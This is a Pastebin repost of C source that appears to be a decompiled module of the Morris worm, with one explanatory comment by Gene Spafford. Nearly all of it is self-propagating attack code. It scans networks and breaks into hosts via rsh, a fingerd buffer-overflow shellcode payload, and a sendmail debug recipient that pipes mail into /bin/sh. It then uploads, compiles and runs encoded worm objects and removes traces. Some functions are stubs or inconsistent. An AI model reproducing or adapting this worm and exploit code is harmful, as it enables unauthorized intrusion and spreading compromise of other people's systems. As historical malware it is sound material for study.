Advertisement
FlyFar

hs.c

Feb 28th, 2023
739
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 32.83 KB | Cybersecurity | 0 0
  1. /* dover */
  2.  
  3. #include "worm.h"
  4. #include <stdio.h>
  5. #include <strings.h>
  6. #include <signal.h>
  7. #include <errno.h>
  8. #include <ctype.h>
  9. #include <sys/types.h>
  10. #include <sys/time.h>
  11. #include <sys/wait.h>
  12. #include <sys/file.h>
  13. #include <sys/stat.h>
  14. #include <sys/socket.h>
  15. #include <netinet/in.h>
  16.  
  17. extern struct hst *h_addr2host(), *h_name2host();
  18. extern int  justreturn();
  19. extern int errno;
  20. extern char *malloc();
  21.  
  22. int alarmed = 0;
  23. int ngateways, *gateways;
  24. struct hst *me, *hosts;
  25.  
  26. int nifs;
  27. struct ifses ifs[30];               /*  Arbitrary number, fix */
  28.  
  29. /* Clean hosts not contacted from the host list. */
  30. h_clean()                   /* 0x31f0 */
  31. {
  32.     struct hst *newhosts, *host, *next;
  33.    
  34.     newhosts = NULL;
  35.     for (host = hosts; host != NULL; host = next) {
  36.     next = host->next;
  37.     host->flag &= -7;
  38.     if (host == me || host->flag != 0) {
  39.         host->next = newhosts;
  40.         newhosts = host;
  41.     } else
  42.         free(host);
  43.     }
  44.     hosts = newhosts;
  45. }
  46.  
  47. /* Look for a gateway we can contact. */
  48. hg()                /* 0x3270, check again */
  49. {
  50.     struct hst *host;
  51.     int i;
  52.    
  53.     rt_init();
  54.    
  55.     for (i = 0; i < ngateways; i++) {       /* 24, 92 */
  56.     host = h_addr2host(gateways[i], 1);
  57.     if (try_rsh_and_mail(host))
  58.         return 1;
  59.     }
  60.     return 0;
  61. }
  62.  
  63. ha()                        /* 0x32d4, unchecked */
  64. {
  65.     struct hst *host;
  66.     int i, j, k;
  67.     int l416[100];
  68.     int l420;
  69.    
  70.     if (ngateways < 1)
  71.     rt_init();
  72.     j = 0;
  73.     for (i = 0; i < ngateways; i++) {       /* 40, 172 */
  74.     host = h_addr2host(gateways[i], 1);
  75.     for (k = 0; k < 6; k++) {       /* 86, 164 */
  76.         if (host->o48[k] == 0)
  77.         continue;           /* 158 */
  78.         if (try_telnet_p(host->o48[k]) == 0)
  79.         continue;
  80.         l416[j] = host->o48[k];
  81.         j++;
  82.     }
  83.     }
  84.    
  85.     permute(l416, j, sizeof(l416[0]));
  86.    
  87.     for (i = 0; i < j; i++) {           /* 198, 260 */
  88.     if (hi_84(l416[i] & netmaskfor(l416[i])))
  89.         return 1;
  90.     }
  91.     return 0;
  92. }
  93.  
  94. hl()                        /* 0x33e6 */
  95. {
  96.     int i;
  97.    
  98.     for (i = 0; i < 6; i++) {           /* 18, 106 */
  99.     if (me->o48[i] == 0)
  100.         break;
  101.     if (hi_84(me->o48[i] & netmaskfor(me->o48[i])) != 0)
  102.         return 1;
  103.     }
  104.     return 0;
  105. }
  106.  
  107. hi()                        /* 0x3458 */
  108. {
  109.     struct hst *host;
  110.    
  111.     for (host = hosts; host; host = host->next )
  112.     if ((host->flag & 0x08 != 0) && (try_rsh_and_mail(host) != 0))
  113.         return 1;
  114.     return 0;
  115. }
  116.  
  117. hi_84(arg1)                 /* 0x34ac */
  118. {
  119.     int l4;
  120.     struct hst *host;
  121.     int l12, l16, l20, i, l28, adr_index, l36, l40, l44;
  122.     int netaddrs[2048];
  123.    
  124.     l12 = netmaskfor(arg1);
  125.     l16 = ~l12;
  126.    
  127.     for (i = 0; i < nifs; i++) {        /* 128,206 */
  128.     if (arg1 == (ifs[i].if_l24 & ifs[i].if_l16))
  129.         return 0;               /* 624 */
  130.     }
  131.    
  132.     adr_index = 0;
  133.     if (l16 == 0x0000ffff) {            /* 330 */
  134.     l44 = 4;
  135.     for (l40 = 1; l40 < 255; l40++)     /* 236,306 */
  136.         for (l20 = 1; l20 <= 8; l20++)  /* 254,300 */
  137.         netaddrs[adr_index++] = arg1 | (l20 << 16) | l40;
  138.     permute(netaddrs, adr_index, sizeof(netaddrs[0]));
  139.     } else {                    /* 432 */
  140.     l44 = 4;
  141.     for (l20 = 1; l20 < 255; l20++)
  142.         netaddrs[adr_index++] = (arg1 | l20);
  143.     permute(netaddrs, 3*sizeof(netaddrs[0]), sizeof(netaddrs[0]));
  144.     permute(netaddrs, adr_index - 6, 4);
  145.     }
  146.     if (adr_index > 20)
  147.     adr_index = 20;
  148.     for (l36 = 0; l36 < adr_index; l36++) { /* 454,620 */
  149.     l4 = netaddrs[l36];
  150.     host = h_addr2host(l4, 0);
  151.     if (host == NULL || (host->flag & 0x02) == 0)
  152.         continue;
  153.     if (host == NULL || (host->flag & 0x04) == 0 ||
  154.         command_port_p(l4, l44) == 0)
  155.         continue;
  156.     if (host == NULL)
  157.         host = h_addr2host(l4, 1);
  158.     if (try_rsh_and_mail(host))
  159.         return 1;
  160.     }
  161.     return 0;
  162. }
  163.  
  164. /* Only called in the function above */
  165. static command_port_p(addr, time)       /* x36d2, <hi+634> */
  166.      u_long addr;
  167.      int time;
  168. {
  169.     int s, connection;                  /* 28 */
  170.     struct sockaddr_in sin;         /* 16 bytes */
  171.     int (*save_sighand)();
  172.    
  173.     s = socket(AF_INET, SOCK_STREAM, 0);
  174.     if (s < 0)
  175.     return 0;
  176.     bzero(&sin, sizeof(sin));
  177.     sin.sin_family = AF_INET;
  178.     sin.sin_addr.s_addr = addr;
  179.     sin.sin_port = IPPORT_CMDSERVER;        /* Oh no, not the command serve
  180. r... */
  181.    
  182.     save_sighand = signal(SIGALRM, justreturn);     /* Wakeup if it
  183.  fails */
  184.    
  185.     /* Set up a timeout to break from connect if it fails */
  186.     if (time < 1)
  187.     time = 1;
  188.     alarm(time);
  189.     connection = connect(s, &sin, sizeof(sin));
  190.     alarm(0);
  191.    
  192.     close(s);
  193.    
  194.     if (connection < 0 && errno == ENETUNREACH)
  195.     error("Network unreachable");
  196.     return connection != -1;
  197. }
  198.  
  199. static try_telnet_p(addr)           /* x37b2 <hi+858>, checked */
  200.      u_long addr;
  201. {
  202.     int s, connection;                  /* 28 */
  203.     struct sockaddr_in sin;         /* 16 bytes */
  204.     int (*save_sighand)();
  205.    
  206.     s = socket(AF_INET, SOCK_STREAM, 0);
  207.     if (s < 0)
  208.     return 0;
  209.     bzero(&sin, sizeof(sin));
  210.     sin.sin_family = AF_INET;
  211.     sin.sin_addr.s_addr = addr;
  212.     sin.sin_port = IPPORT_TELNET;       /* This time try telnet... */
  213.    
  214.     /* Set up a 5 second timeout, break from connect if it fails */
  215.     save_sighand = signal(SIGALRM, justreturn);
  216.     alarm(5);
  217.     connection = connect(s, &sin, sizeof(sin));
  218.     if (connection < 0  &&  errno == ECONNREFUSED) /* Telnet connection refuse
  219. d */
  220.     connection = 0;
  221.     alarm(0);                   /* Turn off timeout */
  222.    
  223.     close(s);
  224.    
  225.     return connection != -1;
  226. }
  227.  
  228. /* Used in hg(), hi(), and hi_84(). */
  229. static try_rsh_and_mail(host)               /* x3884, <hi+1068> */
  230.      struct hst *host;
  231. {
  232.     int fd1, fd2, result;
  233.    
  234.     if (host == me)
  235.     return 0;               /* 1476 */
  236.     if (host->flag & 0x02)
  237.     return 0;
  238.     if (host->flag & 0x04)
  239.     return 0;
  240.     if (host->o48[0] == 0 || host->hostname == NULL)
  241.     getaddrs(host);
  242.     if (host->o48[0] == 0) {
  243.     host->flag |= 0x04;
  244.     return 0;
  245.     }
  246.     other_sleep(1);
  247.     if (host->hostname  &&      /* 1352 */
  248.     fork_rsh(host->hostname, &fd1, &fd2,
  249.           XS("exec /bin/sh"))) {        /* <env+188> */
  250.     result = talk_to_sh(host, fd1, fd2);
  251.     close(fd1);
  252.     close(fd2);
  253.     /* Prevent child from hanging around in the <exiting> state */
  254.     wait3((union wait *)NULL, WNOHANG, (struct rusage *)NULL);
  255.     if (result != 0)
  256.         return result;
  257.     }
  258.    
  259.     if (try_finger(host, &fd1, &fd2)) {     /* 1440 */
  260.     result = talk_to_sh(host, fd1, fd2);
  261.     close(fd1);
  262.     close(fd2);
  263.     if (result != 0)
  264.         return result;
  265.     }
  266.     if (try_mail(host))
  267.     return 1;
  268.    
  269.     host->flag |= 4;
  270.     return 0;
  271. }
  272.  
  273.  
  274. /* Check a2in() as it is updated */
  275. /* Used in twice in try_rsh_and_mail(), once in hu1(). */
  276. static talk_to_sh(host, fdrd, fdwr)     /* x3a20, Checked, changed <hi+
  277. >*/
  278.      struct hst *host;
  279.      int fdrd, fdwr;
  280. {
  281.     object *objectptr;
  282.     char send_buf[512];             /* l516 */
  283.     char print_buf[52];             /* l568 */
  284.     int l572, l576, l580, l584, l588,  l592;
  285.    
  286.     objectptr = getobjectbyname(XS("l1.c"));    /* env 200c9 */
  287.    
  288.     if (objectptr == NULL)
  289.     return 0;               /* <hi+2128> */
  290.     if (makemagic(host, &l592, &l580, &l584, &l588) == 0)
  291.     return 0;
  292.     send_text(fdwr, XS("PATH=/bin:/usr/bin:/usr/ucb\n"));
  293.     send_text(fdwr, XS("cd /usr/tmp\n"));
  294.     l576 = random() % 0x00FFFFFF;
  295.    
  296.     sprintf(print_buf, XS("x%d.c"), l576);
  297.     /* The 'sed' script just puts the EOF on the transmitted program. */
  298.     sprintf(send_buf, XS("echo gorch49;sed \'/int zz;/q\' > %s;echo gorch50\n"
  299. ),
  300.         print_buf);
  301.    
  302.     send_text(fdwr, send_buf);
  303.    
  304.     wait_for(fdrd, XS("gorch49"), 10);
  305.    
  306.     xorbuf(objectptr->buf, objectptr->size);
  307.     l572 = write(fdwr, objectptr->buf, objectptr->size);
  308.     xorbuf(objectptr->buf, objectptr->size);
  309.    
  310.     if (l572 != objectptr->size) {
  311.     close(l588);
  312.     return 0;               /* to <hi+2128> */
  313.     }
  314.     send_text(fdwr, XS("int zz;\n\n"));
  315.     wait_for(fdrd, XS("gorch50"), 30);
  316.    
  317. #define COMPILE  "cc -o x%d x%d.c;./x%d %s %d %d;rm -f x%d x%d.c;echo DONE\n"
  318.     sprintf(send_buf, XS(COMPILE), l576, l576, l576,
  319.         inet_ntoa(a2in(l592)), l580, l584, l576, l576);
  320.    
  321.    
  322.     send_text(fdwr, send_buf);
  323.    
  324.     if (wait_for(fdrd, XS("DONE"), 100) == 0) {
  325.     close(l588);
  326.     return 0;               /* <hi+2128> */
  327.     }
  328.     return waithit(host, l592, l580, l584, l588);
  329. }
  330.  
  331. makemagic(arg8, arg12, arg16, arg20, arg24) /* checked */
  332.      struct hst *arg8;
  333.      int *arg12, *arg16, *arg20, *arg24;
  334. {
  335.     int s, i, namelen;
  336.     struct sockaddr_in sin0, sin1;      /* 16 bytes */
  337.    
  338.     *arg20 = random() & 0x00ffffff;
  339.     bzero(&sin1, sizeof(sin1));
  340.     sin1.sin_addr.s_addr = me->l12;
  341.    
  342.     for (i= 0; i < 6; i++) {            /* 64, 274 */
  343.     if (arg8->o48[i] == NULL)
  344.         continue;               /* 266 */
  345.     s = socket(AF_INET, SOCK_STREAM, 0);
  346.     if (s < 0)
  347.         return 0;               /* 470 */
  348.     bzero(&sin0, sizeof(sin0));
  349.     sin0.sin_family = AF_INET;
  350.     sin0.sin_port = IPPORT_TELNET;
  351.     sin0.sin_addr.s_addr = arg8->o48[i];
  352.     errno = 0;
  353.     if (connect(s, &sin0, sizeof(sin0)) != -1) {
  354.         namelen = sizeof(sin1);
  355.         getsockname(s, &sin1, &namelen);
  356.         close(s);
  357.         break;
  358.     }
  359.     close(s);
  360.     }
  361.    
  362.     *arg12 = sin1.sin_addr.s_addr;
  363.    
  364.     for (i = 0; i < 1024; i++) {        /* 286,466 */
  365.     s = socket(AF_INET, SOCK_STREAM, 0);
  366.     if (s < 0)
  367.         return 0;               /* 470 */
  368.     bzero(&sin0, sizeof(sin0));
  369.     sin0.sin_family = AF_INET;
  370.     sin0.sin_port = random() % 0xffff;
  371.     if (bind(s, &sin0, sizeof(sin0)) != -1) {
  372.         listen(s, 10);
  373.         *arg16 = sin0.sin_port;
  374.         *arg24 = s;
  375.         return 1;
  376.     }
  377.     close(s);
  378.     }
  379.    
  380.     return 0;
  381. }
  382.  
  383. /* Check for somebody connecting.  If there is a connection and he has the rig
  384. ht
  385.  * key, send out the
  386.  * a complete set of encoded objects to it. */
  387.  
  388. waithit(host, arg1, arg2, key, arg4)        /* 0x3e86 */
  389.      struct hst *host;
  390. {
  391.     int (*save_sighand)();
  392.     int l8, sin_size, l16, i, l24, l28;
  393.     struct sockaddr_in sin;         /* 44 */
  394.     object *obj;
  395.     char files[20][128];            /* File list, 2608 */
  396.     char *l2612;
  397.     char strbuf[512];
  398.    
  399.     save_sighand = signal(SIGPIPE, justreturn);
  400.    
  401.     sin_size = sizeof(sin);
  402.     alarm(2*60);
  403.     l8 = accept(arg4, &sin, &sin_size);
  404.     alarm(0);
  405.    
  406.     if (l8 < 0)
  407.     goto quit;              /* 1144 */
  408.     if (xread(l8, &l16, sizeof(l16), 10) != 4)
  409.     goto quit;
  410.     l16 = ntohl(l16);
  411.     if (key != l16)
  412.     goto quit;
  413.     for (i = 0; i < nobjects; i++) {    /* 164,432 */
  414.     obj = &objects[i];
  415.     l16 = htonl(obj->size);
  416.     write(l8, &l16, sizeof(l16));
  417.     sprintf(files[i], XS("x%d,%s"),
  418.         (random()&0x00ffffff), obj->name);
  419.     write(l8, files[i], sizeof(files[0]));
  420.     xorbuf(obj->buf, obj->size);
  421.     l24 = write(l8, obj->buf, obj->size);
  422.     xorbuf(obj->buf, obj->size);
  423.     if (l24 != obj->size)
  424.         goto quit;
  425.     }
  426.    
  427.     /* Get rid of my client's key, and tell him the list has ended. */
  428.     l16 = -1;
  429.     if (write(l8, &l16, sizeof(l16)) != 4)
  430.     goto quit;
  431.    
  432.     /* Don't run up the load average too much... */
  433.     sleep(4);
  434.    
  435.     if (test_connection(l8, l8, 30) == 0)
  436.     goto quit;
  437.     send_text(l8, XS("PATH=/bin:/usr/bin:/usr/ucb\n"));
  438.     send_text(l8, XS("rm -f sh\n"));
  439.    
  440.     sprintf(strbuf, XS("if [ -f sh ]\nthen\nP=x%d\nelse\nP=sh\nfi\n"),
  441.         random()&0x00ffffff);
  442.     send_text(l8, strbuf);
  443.    
  444.     for (i = 0; i < nobjects; i++) {    /* 636,1040 */
  445.     if ((l2612 = index(files[i], '.')) == NULL ||
  446.         l2612[1] != 'o')
  447.         continue;
  448.     sprintf(strbuf, XS("cc -o $P %s\n"), files[i]);
  449.     send_text(l8, strbuf);
  450.     if (test_connection(l8, l8, 30) == 0)
  451.         goto quit;              /* 1144 */
  452.     sprintf(strbuf, XS("./$P -p $$ "));
  453.     for(l28 = 0; l28 < nobjects; l28++) {   /* 820,892 */
  454.         strcat(strbuf, files[l28]);
  455.         strcat(strbuf, XS(" "));
  456.     }
  457.     strcat(strbuf, XS("\n"));
  458.     send_text(l8, strbuf);
  459.     if (test_connection(l8, l8, 10) == 0) {
  460.         close(l8);
  461.         close(arg4);
  462.         host->flag |= 2;
  463.         return 1;               /* 1172 */
  464.     }
  465.     send_text(l8, XS("rm -f $P\n"));
  466.     }
  467.    
  468.     for (i = 0; i < nobjects; i++) {    /* 1044,1122 */
  469.     sprintf(strbuf, XS("rm -f %s $P\n"), files[i]);
  470.     send_text(l8, strbuf);
  471.     }
  472.     test_connection(l8, l8, 5);
  473.  quit:
  474.     close(l8);
  475.     close(l24);
  476.     return 0;
  477. }
  478.  
  479. /* Only called from within mail */
  480. static compile_slave(host, s, arg16, arg20, arg24) /* x431e, <waithit+1176> */
  481.      struct hst host;
  482. {    
  483.     object *obj;
  484.     char buf[512];              /* 516 */
  485.     char cfile[56];             /* 568 */
  486.     int wr_len, key;                /* might be same */
  487.    
  488.     obj = getobjectbyname(XS("l1.c"));
  489.     if (obj == NULL)
  490.     return 0;               /* 1590 */
  491.     send_text(s, XS("cd /usr/tmp\n"));
  492.    
  493.     key = (random() % 0x00ffffff);
  494.     sprintf(cfile, XS("x%d.c"), key);
  495.     sprintf(buf, XS("cat > %s <<\'EOF\'\n"), cfile);
  496.     send_text(s, buf);
  497.    
  498.     xorbuf(obj->buf, obj->size);
  499.     wr_len = write(s, obj->buf, obj->size);
  500.     xorbuf(obj->buf, obj->size);
  501.    
  502.     if (wr_len != obj->size)
  503.     return 0;
  504.     send_text(s, XS("EOF\n"));
  505.    
  506.     sprintf(buf, XS("cc -o x%d x%d.c;x%d %s %d %d;rm -f x%d x%d.c\n"),
  507.         key, key, key,
  508.         inet_ntoa(a2in(arg16, arg20, arg24, key, key)->baz));
  509.     return send_text(s, buf);
  510. }
  511.  
  512. static send_text(fd, str)           /* 0x44c0, <waithit+1594> */
  513.      char *str;
  514. {
  515.     write(fd, str, strlen(str));
  516. }
  517.  
  518. /* Used in try_rsh_and_mail(). */
  519. static fork_rsh(host, fdp1, fdp2, str)      /* 0x44f4, <waithit+1646> */
  520.      char *host;
  521.      int *fdp1, *fdp2;
  522.      char *str;
  523. {
  524.     int child;                  /* 4 */
  525.     int fildes[2];              /* 12 */
  526.     int fildes1[2];             /* 20 */
  527.     int fd;
  528.    
  529.     if (pipe(fildes) < 0)
  530.     return 0;
  531.     if (pipe(fildes1) < 0) {
  532.     close(fildes[0]);
  533.     close(fildes[1]);
  534.     return 0;
  535.     }
  536.    
  537.     child = fork();
  538.     if (child < 0) {                /* 1798 */
  539.     close(fildes[0]);
  540.     close(fildes[1]);
  541.     close(fildes1[0]);
  542.     close(fildes1[1]);
  543.     return 0;
  544.     }
  545.     if (child == 0) {               /* 2118 */
  546.     for (fd = 0; fd < 32; fd++)
  547.         if (fd != fildes[0] &&
  548.         fd != fildes1[1] &&
  549.         fd != 2)
  550.         close(fd);
  551.     dup2(fildes[0], 0);
  552.     dup2(fildes[1], 1);
  553.     if (fildes[0] > 2)
  554.         close(fildes[0]);
  555.     if (fildes1[1] > 2)
  556.         close(fildes1[1]);
  557.     /* 'execl()' does not return if it suceeds. */
  558.     execl(XS("/usr/ucb/rsh"), XS("rsh"), host, str, 0);
  559.     execl(XS("/usr/bin/rsh"), XS("rsh"), host, str, 0);
  560.     execl(XS("/bin/rsh"), XS("rsh"), host, str, 0);
  561.     exit(1);
  562.     }
  563.     close(fildes[0]);
  564.     close(fildes1[1]);
  565.     *fdp1 = fildes1[0];
  566.     *fdp2 = fildes[1];
  567.    
  568.     if (test_connection(*fdp1, *fdp2, 30))
  569.     return 1;               /* Sucess!!! */
  570.     close(*fdp1);
  571.     close(*fdp2);
  572.     kill(child, 9);
  573.     /* Give the child a chance to die from the signal. */
  574.     sleep(1);
  575.     wait3(0, WNOHANG, 0);
  576.     return 0;
  577. }
  578.  
  579. static test_connection(rdfd, wrfd, time)            /* x476c,<waith
  580. it+2278> */
  581.      int rdfd, wrfd, time;
  582. {
  583.     char combuf[100], numbuf[100];
  584.    
  585.     sprintf(numbuf, XS("%d"), random() & 0x00ffffff);
  586.     sprintf(combuf, XS("\n/bin/echo %s\n"), numbuf);
  587.     send_text(wrfd, combuf);
  588.     return wait_for(rdfd, numbuf, time);
  589. }
  590.  
  591. static wait_for(fd, str, time)          /* <waithit+2412> */
  592.      int fd, time;
  593.      char *str;
  594. {
  595.     char buf[512];
  596.     int i, length;
  597.    
  598.     length = strlen(str);
  599.     while (x488e(fd, buf, sizeof(buf), time) == 0) { /* 2532 */
  600.     for(i = 0; buf[i]; i++) {
  601.         if (strncmp(str, &buf[i], length) == 0)
  602.         return 1;
  603.     }
  604.     }
  605.     return 0;
  606. }
  607.  
  608. /* Installed as a signal handler */
  609. justreturn(sig, code, scp)                  /* 0x4872 */
  610.      int sig, code;
  611.      struct sigcontext *scp;
  612. {
  613.     alarmed = 1;
  614. }
  615.  
  616. static x488e(fd, buf, num_chars, maxtime)
  617.      int fd, num_chars, maxtime;
  618.      char *buf;
  619. {  
  620.    
  621.     int i, l8, readfds;
  622.     struct timeval timeout;
  623.    
  624.     for (i = 0; i < num_chars; i++) {       /* 46,192 */
  625.     readfds = 1 << fd;
  626.     timeout.tv_usec = maxtime;
  627.     timeout.tv_sec = 0;
  628.     if (select(fd + 1, &readfds, 0, 0, &timeout) <= 0)
  629.         return 0;
  630.     if (readfds == 0)
  631.         return 0;
  632.     if (read(fd, &buf[i], 1) != 1)
  633.         return 0;
  634.     if (buf[i] == '\n')
  635.         break;
  636.     }
  637.     buf[i] = '\0';
  638.     if (i > 0 && l8 > 0)
  639.     return 1;
  640.     return 0;
  641. }
  642.  
  643. /* This doesn't appear to be used anywhere??? */
  644. static char *movstr(arg0, arg1)         /* 0x4958,<just_return+
  645. 230> */
  646.      char *arg0, *arg1;
  647. {
  648.     arg1[0] = '\0';
  649.     if (arg0 == 0)
  650.     return 0;
  651.     while( ! isspace(*arg0))
  652.     arg0++;
  653.  
  654.     if (*arg0 == '\0')
  655.         return 0;
  656.     while(*arg0) {
  657.     if (isspace(*arg0)) break;
  658.     *arg1++ = *arg0++;
  659.     }
  660.     *arg1 = '\0';
  661.     return arg0;
  662. }
  663.  
  664. /*
  665. From Gene Spafford <spaf@perdue.edu>
  666. What this routine does is actually kind of clever.  Keep in
  667. mind that on a Vax the stack grows downwards.
  668.  
  669. fingerd gets its input via a call to gets, with an argument
  670. of an automatic variable on the stack.  Since gets doesn't
  671. have a bound on its input, it is possible to overflow the
  672. buffer without an error message.  Normally, when that happens
  673. you trash the return stack frame.  However, if you know
  674. where everything is on the stack (as is the case with a
  675. distributed binary like BSD), you can put selected values
  676. back in the return stack frame.
  677.  
  678. This is what that routine does.  It overwrites the return frame
  679. to point into the buffer that just got trashed.  The new code
  680. does a chmk (change-mode-to-kernel) with the service call for
  681. execl and an argument of "/bin/sh".  Thus, fingerd gets a
  682. service request, forks a child process, tries to get a user name
  683. and has its buffer trashed, does a return, exec's a shell,
  684. and then proceeds to take input off the socket -- from the
  685. worm on the other machine.  Since many sites never bother to
  686. fix fingerd to run as something other than root.....
  687.  
  688. Luckily, the code doesn't work on Suns -- it just causes it
  689. to dump core.
  690.  
  691. --spaf
  692.  
  693. */    
  694.  
  695. /* This routine exploits a fixed 512 byte input buffer in a VAX running
  696.  * the BSD 4.3 fingerd binary.  It send 536 bytes (plus a newline) to
  697.  * overwrite six extra words in the stack frame, including the return
  698.  * PC, to point into the middle of the string sent over.  The instructions
  699.  * in the string do the direct system call version of execve("/bin/sh"). */
  700.  
  701. static try_finger(host, fd1, fd2)       /* 0x49ec,<just_return+378 */
  702.      struct hst *host;
  703.      int *fd1, *fd2;
  704. {
  705.     int i, j, l12, l16, s;
  706.     struct sockaddr_in sin;         /* 36 */
  707.     char unused[492];
  708.     int l552, l556, l560, l564, l568;
  709.     char buf[536];              /* 1084 */
  710.     int (*save_sighand)();          /* 1088 */
  711.  
  712.     save_sighand = signal(SIGALRM, justreturn);
  713.  
  714.     for (i = 0; i < 6; i++) {           /* 416,608 */
  715.     if (host->o48[i] == 0)
  716.         continue;               /* 600 */
  717.     s = socket(AF_INET, SOCK_STREAM, 0);
  718.     if (s < 0)
  719.         continue;
  720.     bzero(&sin, sizeof(sin));
  721.     sin.sin_family = AF_INET;
  722.     sin.sin_addr.s_addr = host->o48[i];
  723.     sin.sin_port = IPPORT_FINGER;
  724.  
  725.     alarm(10);
  726.     if (connect(s, &sin, sizeof(sin)) < 0) {
  727.         alarm(0);
  728.         close(s);
  729.         continue;
  730.     }
  731.     alarm(0);
  732.     break;
  733.     }
  734.     if (i >= 6)
  735.     return 0;               /* 978 */
  736.     for(i = 0; i < 536; i++)            /* 628,654 */
  737.     buf[i] = '\0';
  738.     for(i = 0; i < 400; i++)
  739.     buf[i] = 1;
  740.     for(j = 0; j < 28; j++)
  741.     buf[i+j] = "\335\217/sh\0\335\217/bin\320^Z\335\0\335\0\335Z\335\003\320^\\\274;\344\371\344\342\241\256\343\350\357\256\362\351"[j];      
  742.     /* constant string x200a0 */
  743.  
  744.     /* 0xdd8f2f73,0x6800dd8f,0x2f62696e,0xd05e5add,0x00dd00dd,0x5add03d0,0x5e5cbc3b */
  745.     /* "\335\217/sh\0\335\217/bin\320^Z\335\0\335\0\335Z\335\003\320^\\\274;\344\371\344\342\241\256\343\350\357\256\362\351"... */
  746.  
  747.     l556 = 0x7fffe9fc;              /* Rewrite part of the stack frame */
  748.     l560 = 0x7fffe8a8;
  749.     l564 = 0x7fffe8bc;
  750.     l568 = 0x28000000;
  751.     l552 = 0x0001c020;
  752.  
  753. #ifdef sun
  754.     l556 = byte_swap(l556);         /* Reverse the word order for the */
  755.     l560 = byte_swap(l560);         /* VAX (only Suns have to do this) */
  756.     l564 = byte_swap(l564);
  757.     l568 = byte_swap(l568);
  758.     l552 = byte_swap(l552);
  759. #endif sun
  760.  
  761.     write(s, buf, sizeof(buf));         /* sizeof == 536 */
  762.     write(s, XS("\n"), 1);
  763.     sleep(5);
  764.     if (test_connection(s, s, 10)) {
  765.     *fd1 = s;
  766.     *fd2 = s;
  767.     return 1;
  768.     }
  769.     close(s);
  770.     return 0;
  771. }
  772.  
  773. static byte_swap(arg)           /* 0x4c48,<just_return+982 */
  774.      int arg;
  775. {
  776.     int i, j;
  777.  
  778.     i = 0;
  779.     j = 0;
  780.     while (j < 4) {
  781.     i = i << 8;
  782.     i |= (arg & 0xff);
  783.     arg = arg >> 8;
  784.     j++;
  785.     }
  786.     return i;
  787. }
  788.  
  789. permute(ptr, num, size)         /* 0x4c9a */
  790.      char *ptr;
  791.      int num, size;
  792. {
  793.     int i, newloc;
  794.     char buf[512];
  795.  
  796.     for (i = 0; i < num*size; i+=size) {    /* 18,158 */
  797.     newloc = size * (random() % num);
  798.     bcopy(ptr+i, buf, size);
  799.     bcopy(ptr+newloc, ptr+i, size);
  800.     bcopy(buf, ptr+newloc, size);
  801.     }
  802. }
  803.  
  804.  
  805. /* Called from try_rsh_and_mail() */
  806. static try_mail(host)               /* x4d3c <permute+162>*/
  807.      struct hst *host;
  808. {
  809.     int i, l8, l12, l16, s;
  810.     struct sockaddr_in sin;         /* 16 bytes */
  811.     char l548[512];
  812.     int (*old_handler)();
  813.     struct sockaddr saddr;          /* Not right */
  814.     int fd_tmp;                 /* ???  part of saddr *
  815. /
  816.    
  817.     if (makemagic(host, &saddr) == 0)
  818.     return 0;               /* <permute+1054> */
  819.     old_handler = signal(SIGALRM, justreturn);
  820.     for( i = 0; i < 6; i++) {           /* to 430 */
  821.     if (host->o48[i] == NULL)
  822.         continue;               /* to 422 */
  823.     s = socket(AF_INET, SOCK_STREAM, 0);
  824.     if (s < 0)
  825.         continue;               /* to 422 */
  826.    
  827.     bzero(&sin, sizeof(sin));       /* 16 */
  828.     sin.sin_family = AF_INET;
  829.     sin.sin_addr.s_addr = host->o48[i];
  830.     sin.sin_port = IPPORT_SMTP;
  831.    
  832.     alarm(10);
  833.     if (connect(s, &sin, sizeof(sin)) < 0) {
  834.         alarm(0);
  835.         close(s);
  836.         continue;               /* to 422 */
  837.     }
  838.     alarm(0);
  839.     break;
  840.     }
  841.    
  842.     if (i < 6)
  843.     return 0;               /* 1054 */
  844.     if (x50bc( s, l548) != 0 || l548[0] != '2')
  845.     goto bad;
  846.    
  847.     send_text(s, XS("debug"));      /* "debug" */
  848.     if (x50bc( s, l548) != 0 || l548[0] != '2')
  849.     goto bad;
  850.    
  851. #define MAIL_FROM "mail from:</dev/null>\n"
  852. #define MAIL_RCPT "rcpt to:<\"| sed \'1,/^$/d\' | /bin/sh ; exit 0\">\n"
  853.    
  854.     send_text(s, XS(MAIL_FROM));
  855.     if (x50bc( s, l548) != 0 || l548[0] != '2')
  856.     goto bad;
  857.     i = (random() & 0x00FFFFFF);
  858.    
  859.     sprintf(l548, XS(MAIL_RCPT), i, i);
  860.     send_text(s, l548);
  861.     if (x50bc( s, l548) != 0 || l548[0] != '2')
  862.     goto bad;
  863.    
  864.     send_text(s, XS("data\n"));
  865.     if (x50bc( s, l548) == 0 || l548[0] != '3')
  866.     goto bad;
  867.    
  868.     send_text(s, XS("data\n"));
  869.    
  870.     compile_slave(host, s, saddr);
  871.    
  872.     send_text(s, XS("\n.\n"));
  873.    
  874.     if (x50bc( s, l548) == 0 || l548[0] != '2') {
  875.     close(fd_tmp);              /* This isn't set yet!!! */
  876.     goto bad;
  877.     }
  878.    
  879.     send_text(s, XS("quit\n"));
  880.     if (x50bc( s, l548) == 0 || l548[0] != '2') {
  881.     close(fd_tmp);              /* This isn't set yet!!! */
  882.     goto bad;
  883.     }
  884.    
  885.     close(s);
  886.     return waithit(host, saddr);
  887.  bad:
  888.     send_text(s, XS("quit\n"));
  889.     x50bc(s, l548);
  890.     close(s);
  891.     return 0;
  892. }
  893.  
  894. /* Used only in try_mail() above.  This fills buffer with a line of the respon
  895. se */
  896. static x50bc(s, buffer)             /* x50bc, <permute+1058
  897. > */
  898.      int s;                 /* socket */
  899.      char *buffer;
  900. {
  901.     /* Fill in exact code later.  It's pretty boring. */
  902. }
  903.  
  904.  
  905. /* I call this "huristic 1". It tries to breakin using the remote execution
  906.  * service.  It is called from a subroutine of cracksome_1 with information fr
  907. om
  908.  * a user's .forword file.  The two name are the original username and the one
  909.  * in the .forward file.
  910.  */
  911. hu1(alt_username, host, username2)      /* x5178 */
  912.      char *alt_username, *username2;
  913.      struct hst *host;
  914. {
  915.     char username[256];
  916.     char buffer2[512];
  917.     char local[8];
  918.     int result, i, fd_for_sh;           /* 780, 784, 788 */
  919.    
  920.     if (host == me)
  921.     return 0;               /* 530 */
  922.     if (host->flag & HST_HOSTTWO)           /* Already tried ??? */
  923.     return 0;
  924.    
  925.     if (host->o48[0] || host->hostname == NULL)
  926.     getaddrs(host);
  927.     if (host->o48[0] == 0) {
  928.     host->flag |= HST_HOSTFOUR;
  929.     return 0;
  930.     }
  931.     strncpy(username, username2, sizeof(username)-1);
  932.     username[sizeof(username)-1] = '\0';
